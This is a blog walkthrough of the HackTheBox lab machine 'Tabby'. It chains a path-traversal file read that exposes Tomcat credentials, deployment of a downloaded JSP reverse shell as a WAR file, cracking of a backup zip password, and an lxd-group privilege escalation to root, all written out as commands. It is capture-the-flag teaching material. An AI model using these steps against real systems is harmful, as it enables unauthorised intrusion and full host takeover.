Home HackTheBox - Tabby
Post
Cancel

HackTheBox - Tabby

Foothold

nmap scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ nmap -min-rate 5000 --max-retries 1 -sV -sC -p- -oN Tabby-full-port-scan.txt 10.10.10.194
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)
|   256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)
|_  256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)
80/tcp    open     http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp  open     http    Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
20688/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Apache/2.4.41 (port 80)

The main page of port 80 reveals a domain name megahosting.htb (that we can immediately add to our /etc/hosts file):

Desktop View

Second thing we can notice is that data breach statement that redirects to http://megahosting.htb/news.php?file=statement.

Desktop View

Desktop View

Due to the .php?file=statement, I wanted to try for LFI and it works:

http://megahosting.htb/news.php?file=../../../../../../../../../../../

Desktop View

The presence of lxd, tomcat, and mysql in /etc/passwd may be useful later. Let’s check port 8080.

Tomcat9 (port 8080)

Tomcat 9 seems to be used. Plus, we can read that users are defined in /etc/tomcat9/tomcat-users.xml:

Desktop View

Via gobuster and dirb, we see that there some “hidden” folders like /manager. Accessing this page requires credentials:

Desktop View Desktop View Desktop View

At this point, we can say that we want to take avantage of the LFI we found to retrieve tomcat-users.xml.

After trying several path and looking for tomcat’s installation and configuration directories, I came across with this successful one http://megahosting.htb/news.php?file=../../../../../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml

Desktop View Desktop View Desktop View

The user is tomcat and his password is $3cureP4s5w0rd123!.

Surprisingly, we got an “access denied” response on manager when we log in:

Desktop View

Exploiting Tomcat to gain a reverse shell

Reading at hacktricks - pentesting web (tomcat), I understood that by deploying a malicious WAR file via tomcat, I can run malicious code.

WAR files are just zip files.

I looked for jsp(JavaServer Pages) reverse shell and I used the first one:

https://gist.github.com/halozheng/bf0eaa60c5f166dbc848

1
2
3
4
5
6
7
8
$ wget https://gist.githubusercontent.com/halozheng/bf0eaa60c5f166dbc848/raw/a8a53f3275c378897b24dd04e385465d0bee06b6/shell.jsp
# Edit shell.jsp with HTB IP and listener port
$ zip monshell.war shell.jsp
$ curl --upload-file monshell.war -u "tomcat:\$3cureP4s5w0rd123!" "http://10.10.10.194:8080/manager/text/deploy?path=/monshell"
OK - Deployed application at context path [/monshell]
# Run a listener
$ nc -lnvp 1234
...

Visiting http://10.10.10.194:8080/monshell/shell.jsp and we have a reverse shell as user tomcat:

Desktop View


User: ash

Now if we remember the /etc/passwd file we saw earlier, or if we just take a look at /etc/home, we see there is a user called ash.

I wanted to list all files that belongs to him and I found an interesting zip file:

1
2
3
$ find / -user ash 2>/dev/null
/var/www/html/files
/var/www/html/files/16162020_backup.zip

To get it on my own machine I printed the base64 of the file’s content then I pasted it in a new file:

1
2
3
4
5
6
7
8
9
# On victim's machine
$ base64 16162020_backup.zip
...
# On my machine
$ cat > file.b64
... 
$ base64 -d file.b64 > 16162020_backup.zip
$ file 16162020_backup.zip 
16162020_backup.zip: Zip archive data, at least v1.0 to extract

Cracking zip with john

Do not forget zip2john:

1
$ zip2john 16162020_backup.zip > 16162020_backup.john

Desktop View

And we retrieved the following password: admin@it.

1
2
3
4
5
tomcat@tabby:~$ su ash
Password: admin@it
ash@tabby:/opt/tomcat$ cd
ash@tabby:~$ cat user.txt 
662b777f8536a0dce33afdd15851778b

Privesc via LXD Group (Road to oot)

Ash is part of lxd group:

Desktop View

Following the steps of this hacktricks article, we can perform a privilege escalation:

  1. On our machine:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#Install requirements
sudo apt update
sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools
#Clone repo
go get -d -v github.com/lxc/distrobuilder
#Make distrobuilder
cd $HOME/go/src/github.com/lxc/distrobuilder
make
cd
#Prepare the creation of alpine
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
#Create the container
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8
  1. Transfer ` lxd.tar.xz and rootfs.squashfs on victim's machine. Then run lxd init` and these commands:
1
2
3
4
5
6
7
8
$ lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
$ lxc image list #You can see your new imported image
$ lxc init alpine privesc -c security.privileged=true
$ lxc list #List containers
$ lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
$ lxc start privesc
$ lxc exec privesc /bin/sh
~# cd /mnt/root #Here is where the filesystem is mounted

Desktop View

Flag:

1
2
$ cat root.txt 
26571b9decff2a772d66c476d47d4875

This post is licensed under 0x3n0 by the author.

HackTheBox - Academy

Passage Writeup